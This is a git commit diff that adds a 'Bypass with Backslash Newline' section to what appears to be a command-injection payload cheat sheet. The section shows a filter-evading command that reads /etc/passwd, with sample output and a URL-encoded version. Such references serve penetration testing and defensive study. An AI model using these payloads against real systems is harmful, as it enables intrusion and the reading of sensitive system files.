command injection with backslash newline

This commit is contained in:
xplo1t-sec 2022-11-06 14:22:30 +05:30
parent c17ae602fc
commit c1d1c9fcbc

View file

@ -12,6 +12,7 @@
* [Filter Bypasses](#filter-bypasses)
* [Bypass without space](#bypass-without-space)
* [Bypass with a line return](#bypass-with-a-line-return)
* [Bypass with Backslash Newline](#bypass-with-backslash-newline)
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
* [Bypass blacklisted words](#bypass-blacklisted-words)
* [Bypass with single quote](#bypass-with-single-quote)
@ -136,6 +137,25 @@ You can also write files.
hello
```
### Bypass with Backslash Newline
Commands can be broken into parts by using backslash followed by a newline
```powershell
cat /et\
c/pa\
sswd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
[SNIP]
```
URL encoded form would look like this:
```powershell
cat%20/et%5C%0Ac/pa%5C%0Asswd
```
### Bypass characters filter via hex encoding
Linux